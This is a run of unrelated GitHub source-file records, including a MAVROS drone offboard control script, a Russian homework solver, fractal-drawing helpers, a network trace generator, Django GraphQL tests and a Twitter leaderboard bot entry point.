rospy.wait_for_service('/mavros/mission/clear')\n self.svc_clear_waypoints = rospy.ServiceProxy('mavros/mission/clear', WaypointClear)\n\n rospy.wait_for_service('/mavros/mission/set_current')\n self.svc_set_current_waypoint = rospy.ServiceProxy(\n 'mavros/mission/set_current',\n WaypointSetCurrent)\n\n rospy.wait_for_service('/mavros/cmd/command')\n self._srv_cmd_long = rospy.ServiceProxy(\n '/mavros/cmd/command', CommandLong, persistent=True)\n\n # Publishers\n self.pub_rc_override = rospy.Publisher(\n 'mavros/rc/override', OverrideRCIn, queue_size=10)\n\n # Subscribers\n self.sub_waypoints = rospy.Subscriber(\n \"/mavros/mission/waypoints\",\n WaypointList, self.__waypoints_cb)\n\n self.sub_current = rospy.Subscriber(\n \"/mavros/mission/reached\", WaypointReached,\n self.__current_cb)\n\n def __waypoints_cb(self, topic):\n self.lock.acquire()\n try:\n self.waypoint_list = topic.waypoints\n finally:\n self.lock.release()\n\n def __current_cb(self, waypoint_reached):\n rospy.loginfo('__current_cb: ')\n rospy.loginfo('__current_cb: %d', waypoint_reached.wp_seq)\n self.lock.acquire()\n try:\n self.current_waypoint = waypoint_reached.wp_seq\n wp = self.waypoint_list[self.current_waypoint]\n cone_alt = wp.z_alt\n (q, r) = divmod(cone_alt, 2)\n if r == 1:\n rospy.set_param(\"/CONE_ON_GRASS\", True)\n rospy.loginfo('Cone is on grass')\n else:\n rospy.set_param(\"/CONE_ON_GRASS\", False)\n rospy.loginfo('Cone is not on grass')\n except:\n rospy.loginfo(\"Failed to get current waypoint details\")\n # Make a safe bet\n rospy.set_param(\"/CONE_ON_GRASS\", True)\n finally:\n self.lock.release()\n\n def print_waypoints(self):\n \"\"\"Prints Pixhawk waypoints to stdout\"\"\"\n for seq, waypoint in enumerate(self.waypoint_list):\n print(' seq: ' + str(seq) +\n ' waypoint.is_current: ' + str(waypoint.is_current) +\n ' 
waypoint.autocontinue: ' + str(waypoint.autocontinue) +\n ' waypoint.frame: ' + str(waypoint.frame) +\n ' waypoint.command: ' + str(waypoint.command) +\n ' waypoint.param1: ' + str(waypoint.param1) +\n ' waypoint.param2: ' + str(waypoint.param2) +\n ' waypoint.param3: ' + str(waypoint.param3) +\n ' waypoint.param4: ' + str(waypoint.param4) +\n ' waypoint.x_lat: ' + str(waypoint.x_lat) +\n ' waypoint.y_long: ' + str(waypoint.y_long) +\n ' waypoint.z_alt: ' + str(waypoint.z_alt) +\n '')\n\n #\n # throttle: Desired PWM value\n #\n def set_throttle(self, throttle):\n \"\"\"Set throttle\"\"\"\n rospy.loginfo('mavros/rc/override, throttle')\n msg = OverrideRCIn()\n msg.channels[THROTTLE_CHANNEL] = throttle # Desired PWM value\n rospy.loginfo(msg)\n self.pub_rc_override.publish(msg)\n\n #\n # servo: Desired PWM value\n #\n def set_servo(self, servo):\n \"\"\"Set servo\"\"\"\n rospy.loginfo('mavros/rc/override, servo')\n msg = OverrideRCIn()\n msg.channels[STEER_CHANNEL] = servo # Desired PWM value\n rospy.loginfo(msg)\n self.pub_rc_override.publish(msg)\n\n #\n # throttle: Desired PWM value\n # servo: Desired PWM value\n #\n def set_throttle_servo(self, throttle, servo):\n \"\"\"Set throttle AND servo\"\"\"\n rospy.loginfo('mavros/rc/override, throttle and servo')\n msg = OverrideRCIn()\n msg.channels[THROTTLE_CHANNEL] = throttle # Desired PWM value\n msg.channels[STEER_CHANNEL] = servo # Desired PWM value\n rospy.loginfo(msg)\n self.pub_rc_override.publish(msg)\n\n #\n # Push waypoints\n #\n def push_waypoints(self, waypoints):\n \"\"\"Push waypoints to Pixhawk\"\"\"\n rospy.loginfo('/mavros/mission/push')\n try:\n resp = self.svc_push_waypoints(waypoints)\n rospy.loginfo(resp)\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service push_waypoints call failed: %s.\",\n err)\n return None\n\n #\n # Pull waypoints\n # Request update waypoint list.\n #\n def pull_waypoints(self):\n \"\"\"Request update waypoint list\"\"\"\n rospy.loginfo('/mavros/mission/pull')\n try:\n resp = self.svc_pull_waypoints()\n rospy.loginfo('success: ' + str(resp.success) + ' wp_received: ' + str(resp.wp_received))\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service pull_waypoints call failed: %s.\",\n err)\n return None\n\n #\n # Clear waypoints\n #\n def clear_waypoints(self):\n \"\"\"Clear waypoints\"\"\"\n rospy.loginfo('/mavros/mission/clear')\n try:\n resp = self.svc_clear_waypoints()\n rospy.loginfo(resp)\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service clear_waypoints call failed: %s.\",\n err)\n return None\n\n #\n # Set current waypoint\n #\n def set_current_waypoint(self, idx):\n \"\"\"Set current wp\"\"\"\n rospy.loginfo('/mavros/mission/set_current: ' + str(idx))\n try:\n resp = self.svc_set_current_waypoint(idx)\n rospy.loginfo(resp)\n return resp\n except rospy.ServiceException as err:\n rospy.loginfo(\n \"Service set_current_waypoint call failed: %s. Index %d could not be set. 
\"\n \"Check that GPS is enabled.\",\n err, idx)\n return None\n\n #\n # Goto wp\n #\n # def goto_waypoint(self, args):\n # \"\"\"Go to WP\"\"\"\n # wp = Waypoint(\n # frame=args.frame,\n # command=args.command,\n # param1=args.param1,\n # param2=args.param2,\n # param3=args.param3,\n # param4=args.param4,\n # x_lat=args.x_lat,\n # y_long=args.y_long,\n # z_alt=args.z_alt\n # )\n # try:\n # service = rospy.ServiceProxy('mavros/mission/goto', WaypointGOTO)\n # resp = service(waypoint=wp)\n # rospy.loginfo(resp)\n # return resp\n # except rospy.ServiceException, e:\n # rospy.loginfo('Service call failed: {0}'.format(e))\n # return None\n\n def get_param_int(self, name):\n \"\"\"Get parameter value from UAV\"\"\"\n ret = None\n try:\n ret = self.svc_get_param(param_id=name)\n return ret.value.integer\n except rospy.ServiceException as ex:\n rospy.logerr(ex)\n return None\n\n def send_mavros_cmd(self, bool1, msgid, bool2, p0, p1, p2, p3, p4, p5, p6):\n \"\"\"Send a mavros command\"\"\"\n rospy.loginfo(\"/mavros/cmd/command/ %s %s %s %s %s %s %s %s %s %s\",\n str(bool1), str(msgid),\n str(bool2), str(p0),\n str(p1), str(p2), str(p3), str(p4), str(p5), str(p6))\n self._srv_cmd_long(bool1, msgid, bool2, p0, p1, p2, p3, p4, p5, p6)\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"offb_node_py\")\n\n state_sub = rospy.Subscriber(\"mavros/state\", State, callback=state_cb)\n\n local_pos_pub = rospy.Publisher(\"mavros/setpoint_position/local\", PoseStamped, queue_size=10)\n\n rospy.wait_for_service(\"/mavros/cmd/arming\")\n arming_client = rospy.ServiceProxy(\"mavros/cmd/arming\", CommandBool)\n\n rospy.wait_for_service(\"/mavros/set_mode\")\n set_mode_client = rospy.ServiceProxy(\"mavros/set_mode\", SetMode)\n\n ctrl = UAV_Control()\n\n # Setpoint publishing MUST be faster than 2Hz\n rate = rospy.Rate(20)\n i = 0\n\n # Wait for Flight Controller connection\n while (not rospy.is_shutdown() and not current_state.connected):\n print(current_state.connected)\n rate.sleep()\n\n pose = PoseStamped()\n\n pose.pose.position.x = 0\n pose.pose.position.y = 0\n pose.pose.position.z = 2\n\n # Send a few setpoints before starting\n for i in range(100):\n if (rospy.is_shutdown()):\n break\n\n local_pos_pub.publish(pose)\n rate.sleep()\n\n offb_set_mode = SetModeRequest()\n offb_set_mode.custom_mode = 'MANUAL'\n\n arm_cmd = CommandBoolRequest()\n arm_cmd.value = True\n\n last_req = rospy.Time.now()\n\n while (not rospy.is_shutdown()):\n if (current_state.mode != \"MANUAL\" and (rospy.Time.now() - last_req) > rospy.Duration(5.0)):\n print('setting mode')\n print(f'mode: {current_state.mode}')\n print(f'armed: {current_state.armed}')\n if (set_mode_client.call(offb_set_mode).mode_sent == True):\n rospy.loginfo(\"MANUAL enabled\")\n\n last_req = rospy.Time.now()\n else:\n if (not current_state.armed and (rospy.Time.now() - last_req) > rospy.Duration(5.0)):\n print('arming')\n print(f'mode: {current_state.mode}')\n print(f'armed: {current_state.armed}')\n if (arming_client.call(arm_cmd).success == True):\n rospy.loginfo(\"Vehicle armed\")\n print('Vehicle armed')\n\n last_req = rospy.Time.now()\n # print(pose)\n # local_pos_pub.publish(pose)\n\n from math import floor, sin, pi\n\n ctrl.set_servo(floor(1200 + sin(pi * (i % 300) / 300) * 500))\n\n i += 1\n rate.sleep()\n","repo_name":"DuaneNielsen/offboard","sub_path":"scripts/offb_node.py","file_name":"offb_node.py","file_ext":"py","file_size_in_byte":11594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34388450703","text":"# 2. Петя и Катя – брат и сестра. Петя – студент, а Катя –школьница. Петя помогает Кате по математике. Он задумывает два\n# натуральных числа X и Y (X,Y≤1000), а Катя должна их отгадать. Для этого Петя делает две подсказки. Он называет сумму этих чисел S и их\n# произведение P. Помогите Кате отгадать задуманные Петей числа.\n\n# Пример:\n\n# 4 4 -> 2 2\n# 5 6 -> 2 3\n\np = int(input(\"Сумма этих чисел: \"))\nq = int(input(\"Произведение этих чисел: \"))\n\n# x * x - p * x + q == 0\n\ndisk = p*p - 4 * q\nif disk < 0:\n print(\"Петя обманул Катю - не загадал числа\")\nelif disk == 0:\n print(\"Петя загадал два одинаковых числа: \", int(p/2))\nelif disk > 0:\n x_1 = int((p + disk ** 0.5)/2)\n x_2 = int((p - disk ** 0.5)/2)\n print(\"Первое число: \", x_1, \"второе число: \", x_2)\n","repo_name":"NadezhdaSamoiolova/Python_with_Maria_new","sub_path":"Homework_2/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20503991501","text":"# Nova classe para Athlete\nclass AthleteList(list):\n def __init__(self, a_name, a_dob=None, a_times=[]):\n list.__init__([])\n self.name = a_name\n self.dob = a_dob\n self.extend(a_times)\n \n def sanitize(time_string):\n # a função \"sanitize\" é a mesma do módulo 5\n if '-' in time_string:\n splitter = '-'\n elif ':' in time_string:\n splitter = ':'\n else:\n return(time_string)\n (mins, secs) = time_string.split(splitter)\n return(mins + '.' + secs)\n \n def top3(self):\n return(sorted(set([sanitize(t) for t in self]))[0:3])\n \n def get_coach_data(filename):\n try:\n with open(filename) as f:\n data = f.readline()\n templ = data.strip().split(',')\n return AthleteList(templ.pop(0), templ.pop(0), templ)\n except IOError as ioerr:\n print('File error: '+ str(ioerr))\n return(None)","repo_name":"wmfinamore/pyLab","sub_path":"7_desenvolvimento_web/.ipynb_checkpoints/athletelist-checkpoint.py","file_name":"athletelist-checkpoint.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"27692174616","text":"import random\n\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFontMetrics\n\nMAPSIZE = 600\n\n\nclass Canvas(QtWidgets.QLabel):\n def __init__(self, tile_size):\n super().__init__()\n self.tile_size = tile_size\n pixmap = QtGui.QPixmap(MAPSIZE, MAPSIZE)\n self.setPixmap(pixmap)\n\n def __draw_original_map(self, tiles):\n self.pixmap().fill(Qt.black)\n painter = QtGui.QPainter(self.pixmap())\n pen = QtGui.QPen(Qt.SolidLine)\n pointX = 0\n pointY = 0\n tile_size = self.width() // len(tiles)\n for i in range(len(tiles)):\n for j in range(len(tiles[i])):\n if tiles[i][j] == 0:\n pen.setColor(Qt.black)\n painter.setBrush(QtGui.QBrush(Qt.black, Qt.SolidPattern))\n elif tiles[i][j] == 1:\n pen.setColor(Qt.white)\n painter.setBrush(QtGui.QBrush(Qt.white, Qt.SolidPattern))\n elif tiles[i][j] == 2:\n pen.setColor(Qt.red)\n painter.setBrush(QtGui.QBrush(Qt.red, Qt.SolidPattern))\n elif tiles[i][j] == 3:\n pen.setColor(Qt.green)\n painter.setBrush(QtGui.QBrush(Qt.green, Qt.SolidPattern))\n painter.setPen(pen)\n painter.drawRect(pointX, pointY, tile_size, tile_size)\n if ((i == 2) and (j == 1)) or ((i == 1) and (j == 2)) or ((i == (len(tiles) - 2)) and (j == (len(tiles) - 3))) or ((i == (len(tiles) - 2)) and (j == (len(tiles) - 3))):\n pass\n else:\n self.__draw_narrow_spot(tiles, i, j, tile_size, pointX, pointY, painter)\n pointX = pointX + tile_size\n pointX = 0\n pointY = pointY + tile_size\n painter.end()\n\n def __draw_narrow_spot(self, tiles, i, j, tile_size, pointX, pointY, painter):\n right = False\n left = False\n top = False\n bot = False\n nb = 0\n if tiles[i][j] == 1 and (tile_size > 15):\n rand_int = random.randint(0, 100)\n if rand_int < 20:\n if (j < len(tiles) - 2) and (tiles[i][j + 1] == 1):\n right = True\n nb = nb + 1\n if (j > 2) and (tiles[i][j - 1] == 1):\n left = True\n nb = nb + 1\n if (i < len(tiles) - 2) and (tiles[i + 1][j] == 1):\n bot = True\n nb = nb + 1\n if (i > 2) and (tiles[i - 1][j] == 1):\n top = True\n nb = nb + 1\n if nb != 2:\n pass\n painter.setPen(QtGui.QPen(Qt.black, Qt.SolidLine))\n painter.setBrush(QtGui.QBrush(Qt.black, Qt.SolidPattern))\n black_zone = tile_size // 3\n if left and right:\n painter.drawRect(pointX, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY + 2 * black_zone, tile_size, tile_size)\n elif top and bot:\n painter.drawRect(pointX, pointY, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, tile_size)\n elif top and left:\n painter.drawRect(pointX, pointY, black_zone, black_zone)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, tile_size)\n painter.drawRect(pointX, pointY + 2 * black_zone, tile_size, tile_size)\n elif top and right:\n painter.drawRect(pointX, pointY, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY + 2 * black_zone, tile_size, tile_size)\n elif bot and left:\n painter.drawRect(pointX, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY + 2 * black_zone, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY, tile_size, tile_size)\n elif bot and right:\n painter.drawRect(pointX, pointY, tile_size, black_zone)\n painter.drawRect(pointX, pointY, black_zone, tile_size)\n painter.drawRect(pointX + 2 * black_zone, pointY + 2 * black_zone, tile_size, tile_size)\n\n def draw_map(self, tiles):\n self.__draw_original_map(tiles)\n\n def __write_info_on_screen(self, text):\n 
painter = QtGui.QPainter(self.pixmap())\n font = painter.font()\n font.setPixelSize(48)\n painter.setFont(font)\n pointX = round(MAPSIZE / 2)\n pointY = pointX\n fm = QFontMetrics(font)\n text_width = fm.width(text) / 2\n text_height = fm.height() / 2\n rectangle = QtCore.QRect(pointX - text_width, pointY - text_height, pointX + text_width, pointY + text_height)\n painter.drawText(rectangle, 0, text)\n\n def __clear_canvas(self):\n painter = QtGui.QPainter(self.pixmap())\n pen = QtGui.QPen()\n pen.setWidth(MAPSIZE)\n pointX = round(MAPSIZE / 2)\n pointY = pointX\n pen.setColor(Qt.white)\n painter.setPen(pen)\n painter.drawPoint(pointX, pointY)\n painter.end()\n\n def show_loading_map_info(self):\n self.__clear_canvas()\n self.__write_info_on_screen(\"Generowanie mapy...\")\n\n def __write_main_info_on_screen(self, text):\n painter = QtGui.QPainter(self.pixmap())\n font = painter.font()\n font.setPixelSize(48)\n painter.setFont(font)\n pointX = round(MAPSIZE / 2)\n pointY = pointX\n fm = QFontMetrics(font)\n text_width = fm.width(text) / 2\n text_height = fm.height() / 2\n rectangle = QtCore.QRect(pointX - text_width, pointY - 3 * text_height, pointX + text_width, pointY - text_height)\n painter.drawText(rectangle, 0, text)\n painter.end()\n\n def show_won_map_info(self):\n self.__clear_canvas()\n self.__write_main_info_on_screen(\"Wygrana!\")\n self.__write_info_on_screen(\"Generowanie mapy...\")\n\n def show_lost_map_info(self):\n self.__clear_canvas()\n self.__write_main_info_on_screen(\"Porażka!\")\n self.__write_info_on_screen(\"Generowanie mapy...\")\n","repo_name":"laki94/MouseRunner","sub_path":"MapCanvas.py","file_name":"MapCanvas.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34709114842","text":"# D). Based on this survey, what will be the most desired programming language forthe year 2020?\n\nlanguage_desired = data1[data1['LanguageDesireNextYear'].notnull()]\nunique_lang={}\nunique_lang\n\ndef plot_dimension_count (unique_dim_dict, plot_title):\n dim_count = pd.DataFrame.from_dict(unique_dim_dict, orient='index', dtype=None)\n dim_count.columns= ['Count']\n dim_count.sort_values('Count', ascending=True, inplace=True)\n dim_count.plot(kind = 'barh', figsize = (12,12), fontsize = 10, title =plot_title,color='c');\n\n plot_dimension_count(unique_lang, 'The Most Popular Languages')\n\n ","repo_name":"satyamgupta8340/pythonassignment6","sub_path":"assign6qD.py","file_name":"assign6qD.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"37465218998","text":"# -*- coding: utf-8 -*-\n# +\nfrom __future__ import print_function\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle \nfrom ipywidgets import interact, interactive, fixed, interact_manual, Layout\nimport ipywidgets as widgets\nimport numpy as np\nfrom math import sin, cos, pi, atan2\nfrom random import randint \nfrom pylab import *\nimport warnings\nwarnings.filterwarnings('ignore')\n\n#Función que realiza la transformación\n#recibe la matriz M, la multiplica por X\n#y le suma t.\ndef transafin(M,t,x):\n y=M@x+t\n return y\n\n#Función que gráfica el triángulo de Sierpinsky.\n#Como ejemplo de un algoritmo determinista.\ndef sierpinsky():\n fig=plt.figure()\n ax=plt.gca()\n Tri=np.array([[0,0]])\n for i in range(8):\n tritrans=np.array([transafin([[0.5,0],[0,0.5]],[0,0],i) for i in Tri])\n tritrans2=np.array([transafin([[0.5,0],[0,0.5]],[0,0.5],i) for i in Tri])\n tritrans3=np.array([transafin([[0.5,0],[0,0.5]],[0.5,0],i) for i in Tri])\n Tri=np.concatenate((tritrans,tritrans2,tritrans3))\n plt.scatter(Tri.transpose()[0],Tri.transpose()[1],color='black',s=0.2)\n ax.set_xticks(np.arange(-0.2,1.4,0.2))\n ax.set_yticks(np.arange(-0.2,1.4,0.2))\n plt.grid()\n ax.axis(\"equal\")\n\n#Función que gráfica el helecho (Fern).\n#Como ejemplo de un algoritmo aleatorio.\ndef fern():\n # Inicializa las listas x e y\n x = [] \n y = [] \n\n # Inicializa el primer elemento de cada una en 0 \n x.append(0) \n y.append(0) \n\n current = 0\n\n for i in range(1, 50000): \n\n # genera un entero aleatorio entre 1 y 100\n z = randint(1, 100) \n\n # las coordenadas de x e y de las ecuaciones\n # son agregadas a la lista.\n\n # probabilidad de 0.16 \n if z == 1: \n x.append(0) \n y.append(0.16*(y[current])) \n\n # probabilidad de 0.85\n if z>= 2 and z<= 86: \n x.append(0.85*(x[current]) + 0.04*(y[current])) \n y.append(-0.04*(x[current]) + 0.85*(y[current])+1.6) \n\n # probabilidad del 0.07\n if z>= 87 and z<= 93: \n x.append(0.2*(x[current]) - 0.26*(y[current])) \n y.append(0.23*(x[current]) + 0.22*(y[current])+1.6) \n\n # probabilidad de 0.07 \n if z>= 94 and z<= 100: \n x.append(-0.15*(x[current]) + 0.28*(y[current])) \n y.append(0.26*(x[current]) + 0.24*(y[current])+0.44) \n\n current = current + 1\n\n plt.scatter(x, y, s = 0.2, edgecolor ='green') \n plt.axis(\"equal\")\n plt.show() \n \n#Función que grafica el copo de Koch\n#lado es el tamaño de la línea y n\n#el número de interaciones.\ndef copoVonKoch(lado, n):\n x_vertice1 = 0\n y_vertice1 = 0\n\n x_vertice2 = lado * cos(2 * pi / 3)\n y_vertice2 = lado * sin(2 * pi / 3)\n\n x_vertice3 = lado * cos(pi / 3)\n y_vertice3 = lado * sin(pi / 3)\n\n curvaVonKoch(x_vertice1, y_vertice1, x_vertice2, y_vertice2, n)\n curvaVonKoch(x_vertice2, y_vertice2, x_vertice3, y_vertice3, n)\n curvaVonKoch(x_vertice3, y_vertice3, x_vertice1, y_vertice1, n)\n\n#Función recursiva que grafica la curva de Koch\n#Recibe las coordenadas iniciales y finales y las dibuja\n#cuando el valor de n es igual a cero.\ndef curvaVonKoch(xi, yi, xf, yf, n):\n if n == 0:\n plot([xi, xf], [yi, yf], lw=1.0, color='b')\n elif n > 0:\n x1 = xi + (xf - xi) / 3.0\n y1 = yi + (yf - yi) / 3.0\n\n x3 = xf - (xf - xi) / 3.0\n y3 = yf - (yf - yi) / 3.0\n\n radio = hypot(x3 - x1, y3 - y1)\n alpha = atan2((y3 - y1), (x3 - x1))\n alpha += pi / 3.0\n x2 = x1 + radio * cos(alpha)\n y2 = y1 + radio * sin(alpha)\n\n curvaVonKoch(xi, yi, x1, y1, n - 1)\n curvaVonKoch(x1, y1, x2, y2, n - 1)\n curvaVonKoch(x2, y2, x3, y3, n - 1)\n curvaVonKoch(x3, y3, xf, yf, n 
- 1)\n\n#Función que grafica la curva de Koch y el \n#copo de Koch.\ndef koch(lado, n):\n axes().set_xlim(0, lado)\n axes().set_ylim(-2, lado / 2.0)\n axes().set_aspect(1.0)\n title('Curva De Von Koch')\n xlim(0, lado)\n curvaVonKoch(0, 0, lado, 0, n)\n show()\n axes().set_xlim(-lado, lado)\n axes().set_ylim(-2, lado + 0.5 * lado)\n axes().set_aspect(1.0)\n title('Copo De Nieve De Koch')\n xlim(-lado, lado)\n copoVonKoch(lado, n)\n show()\n\n#Función recursiva que dibuja la alfonbra de \n#Sierpinksy.\ndef spski_carpet(ax, p, n, size):\n if n > 0:\n ax.add_patch(Rectangle((p[0, 0] - size / 6,\n p[1, 0] - size / 6),\n size / 3, size / 3,\n facecolor=(0.5, 0.5, 0.5),\n linewidth=0))\n q = np.array([[-size / 3], [-size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[-size / 3], [0]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[-size / 3], [size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[0], [-size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[0], [size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[size / 3], [-size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[size / 3], [0]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n q = np.array([[size / 3], [size / 3]])\n spski_carpet(ax, p + q, n - 1, size / 3)\n\n#Función que grafica la alfombra de Sierpinsky.\ndef sierpinski_carpet():\n fig = plt.figure()\n fig.patch.set_facecolor('white')\n ax = plt.gca()\n p = np.array([[0], [0]])\n spski_carpet(ax, p, 4, 1)\n ax.add_patch(Rectangle((-1 / 2, -1 / 2), 1, 1,\n fill=False , edgecolor=(0, 0, 0),\n linewidth=0.5))\n plt.axis('equal')\n plt.axis('off')\n plt.show()\n","repo_name":"c4ttivo/c4ttivo.github.io","sub_path":"iterados.py","file_name":"iterados.py","file_ext":"py","file_size_in_byte":5823,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8138187927","text":"import numpy as np\nimport time\nimport os\n\ndef create_trace_path(args):\n if not os.path.exists(args.trace_dir):\n os.makedirs(args.trace_dir)\n return f'{args.trace_dir}/{args.traffic},{args.spatial}_{args.n_node}_{args.n_step}.npz'\n\ndef create_spatial_p(args):\n if args.spatial == 'highlow':\n spatial_pdf = []\n for i in range(args.n_node):\n if np.random.rand() < 1 / 5:\n spatial_pdf.append(0.3 / 6)\n else:\n spatial_pdf.append(0.025 / 6)\n return np.array(spatial_pdf)\n elif args.spatial == 'uniform':\n return np.random.rand(args.n_node)\n else:\n raise NotImplementedError\n\ndef generate_trace(args):\n args.n_step = args.n_test_step\n # initialize trace\n T = args.n_step * args.coherrent_time * args.n_test_episode\n T_episode = args.n_step * args.coherrent_time\n N = args.n_node\n trace = np.zeros([T, N], dtype=np.uint8)\n spatial_ps = []\n\n for t in range(0, T):\n # compute spatial pdf\n if t % T_episode == 0:\n spatial_p = create_spatial_p(args)\n spatial_ps.append(spatial_p)\n trace[t, :] = np.random.poisson(lam=args.lamda * spatial_p)\n # save\n print('[+] saving')\n path = create_trace_path(args)\n tic = time.time()\n data = {\n 'spatial_ps' : np.array(spatial_ps),\n 'trace': trace,\n }\n np.savez_compressed(path, **data)\n print(f' {time.time() - tic:0.1}(s)')","repo_name":"lethanh-96/tinyqmix-mtc","sub_path":"scenario/generate_trace.py","file_name":"generate_trace.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
+{"seq_id":"13050988723","text":"import pytest\n\nfrom .factories import UserFactory\nfrom project.util.testing_util import GraphQLTestingPal\n\n\nclass TestSendVerificationEmail:\n @pytest.fixture(autouse=True)\n def setup_fixture(self, graphql_client):\n self.graphql_client = graphql_client\n\n def execute(self, user, email):\n if user:\n self.graphql_client.request.user = user\n return self.graphql_client.execute(\n \"\"\"\n mutation {\n sendVerificationEmail(input:{email: \"%s\"}) {\n errors { field, messages },\n session { email, isEmailVerified }\n }\n }\n \"\"\"\n % email\n )[\"data\"][\"sendVerificationEmail\"]\n\n def test_it_requires_login(self):\n assert self.execute(None, \"boop@jones.com\")[\"errors\"] == [\n {\"field\": \"__all__\", \"messages\": [\"You do not have permission to use this form!\"]}\n ]\n\n def test_does_not_reset_verified_when_email_is_unchanged(self, db, mailoutbox):\n user = UserFactory(email=\"boop@jones.com\", is_email_verified=True)\n assert self.execute(user, \"boop@jones.com\") == {\n \"errors\": [],\n \"session\": {\"email\": \"boop@jones.com\", \"isEmailVerified\": True},\n }\n assert len(mailoutbox) == 1\n assert mailoutbox[0].recipients() == [\"boop@jones.com\"]\n\n def test_it_resets_verified_when_email_changes(self, db, mailoutbox):\n user = UserFactory(email=\"old@email.com\", is_email_verified=True)\n assert self.execute(user, \"blap@jones.com\") == {\n \"errors\": [],\n \"session\": {\"email\": \"blap@jones.com\", \"isEmailVerified\": False},\n }\n assert len(mailoutbox) == 1\n assert mailoutbox[0].recipients() == [\"blap@jones.com\"]\n\n\nclass TestPhoneNumber(GraphQLTestingPal):\n QUERY = \"\"\"\n mutation PhoneNumber($input: PhoneNumberInput!) {\n output: phoneNumber(input: $input) {\n errors { field, messages },\n session { phoneNumber }\n }\n }\n \"\"\"\n\n DEFAULT_INPUT = {\n \"phoneNumber\": \"\",\n }\n\n def test_it_requires_login(self):\n self.assert_one_field_err(\"You do not have permission to use this form!\")\n\n def test_it_works(self):\n user = UserFactory(phone_number=\"5551234567\")\n self.set_user(user)\n res = self.execute({\"phoneNumber\": \"6149951231\"})\n assert res == {\"errors\": [], \"session\": {\"phoneNumber\": \"6149951231\"}}\n user.refresh_from_db()\n assert user.phone_number == \"6149951231\"\n","repo_name":"JustFixNYC/tenants2","sub_path":"users/tests/test_schema.py","file_name":"test_schema.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"71"}
+{"seq_id":"72080838631","text":"#!/usr/bin/python3\nimport os\nimport os.path\nimport shutil\nfrom pprint import pprint\n\nfrom nsb_config import options\nfrom nsb_config import default_global_path\nimport nsb_twitter\nimport cotn_twitter\n\n\ndef main():\n debug = options['debug']\n dry_run = options['dry-run']\n\n \n if options['twitter_keys'] != None:\n twitter = nsb_twitter.twitter(options['twitter_keys'])\n else:\n twitter = None\n \n\n\n if options['action'] == 'init':\n print('copying', default_global_path, 'to', options['config'])\n if not options['dry-run']:\n shutil.copy(default_global_path, options['config'])\n \n elif options['action'] == 'update':\n cotn_twitter.update(twitter)\n \n elif options['action'] == 'postDaily':\n cotn_twitter.postYesterday(twitter)\n\n elif options['action'] == 'printBoard':\n cotn_twitter.printBoard()\n\n elif options['action'] == 'none':\n print(\"exiting\")\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jakkdl/necro_score_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
+{"seq_id":"7968769035","text":"\"\"\"\nThe tsnet.network.topology figure out the topology, i.e.,\nupstream and downstream adjacent links for each pipe, and\nstore the information in lists.\n\n\"\"\"\nimport wntr\n\ndef topology(wn):\n \"\"\"Figure out the topology of the network\n\n Parameters\n ----------\n wn : wntr.network.model.WaterNetworkModel\n .inp file used for EPAnet simulation\n npipe : integer\n Number of pipes\n\n Returns\n -------\n links1 : list\n The id of adjacent pipe on the start node.\n The sign represents the direction of the pipe.\n + : flowing into the junction\n - : flowing out from the junction\n links2 : list\n The id of adjacent pipe on the end node.\n The sign represents the direction of the pipe.\n + : flowing into the junction\n - : flowing out from the junction\n utype : list\n The type of the upstream adjacent links.\n If the link is not pipe, the name of that link\n will also be included.\n If there is no upstream link, the type of the start node\n will be recorded.\n dtype : list\n The type of the downstream adjacent links.\n If the link is not pipe, the name of that link\n will also be included.\n If there is no downstream link, the type of the end node\n will be recorded.\n \"\"\"\n npipe = wn.num_pipes\n length = wn.query_link_attribute('length')\n if wntr.__version__>= '0.2.2':\n G = wn.get_graph(link_weight = length)\n else:\n G = wn.get_graph()\n G.weight_graph(link_attribute = length)\n\n # add 'id' attribute to networkx links\n i =1\n for ln, link in wn.links():\n G.edges[link.start_node_name,link.end_node_name, ln]['id'] = i\n i+=1\n\n # allocate the parameters\n links1 = [0] 